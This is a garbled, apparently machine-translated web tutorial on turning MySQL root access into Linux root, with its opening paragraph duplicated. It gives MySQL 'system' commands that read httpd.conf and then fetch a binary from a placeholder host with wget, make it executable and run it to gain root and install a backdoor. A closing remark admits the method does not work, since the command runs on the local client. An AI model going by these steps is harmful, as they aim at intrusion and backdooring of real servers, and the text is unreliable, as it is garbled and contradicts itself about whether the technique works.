Mysql root privilege escalation in the latest linux operating system

Linux privilege escalation: This is a conventional method of privilege escalation in linux. mysql privilege escalation during root login is provided by a function in mysql 5.x linux, which can help us with a lot of tedious tasks, this function 4. There seems to be none below x. I haven't found it and haven't checked the function manual. I just wrote something in my own experience. 4. Let's look at the function manual tomorrow and install another one.

 

Linux privilege escalation: This article describes a linux privilege escalation method, which is a common linux privilege escalation technology .. LinuxIn the environment, mysql Elevation of Privilege when logging on with the root permission In the linux version of mysql5.x, there is a function that can help us do a lot of tedious things, this function 4. There seems to be none below x. I haven't found it and haven't checked the function manual. I just wrote something in my own experience. 4. Let's take a look at the function manual tomorrow for another experiment. Mysql 5.x introduces a system function, which can execute the systemCommandWhen mysql logs on as a root user, this function can be used to execute commands. Of course, this function is within the permitted range. Generally, after obtaining the mysql root Password, we connect to the database, create a table, and thenFile, Get a webshell, and then escalate the permission. Today we use another method. According to the above method, we need to know the absolute path of the web. Of course, this is not easy to find. Some sqlinjection may be displayed when an error is reported, but some may not be. However, according to my method, there is no need to find the web path and directly execute Mysql> system vi/etc/Httpd/Conf/httpd. conf; In this way, we can find the web path. Of course, our goal is not to find the web path and put webshell in. We want to do other things, for example, downloadExExecute p, get the root permission, and install a backdoor. Mysql> system wget http://www.xxx.com/xxxx; Mysql> systemChmod+ X xxxx; mysql> system./xxxx; In this way, the root of mysql becomes the root of the system. For the rest, if ssh is enabled, connect to the system through ssh, enter the user password of mysql, OK, and decide. ~~~~~~~~~~~~~~~~~~~~~~~~~~ ' This method does not work after tests on this site. The command execution is performed locally rather than on a remote server. For example, the systemLsTo list local server files. This article is widely circulated on the Internet, but it only provides a way of thinking for you, or it may be due to a problem in my testing. The benevolent sees benevolence, the wise sees wisdom. Please share your test results below. For more LINUX Elevation of Privilege videos and tutorials, visit the http://www.linuxso.com/a/video/hacking/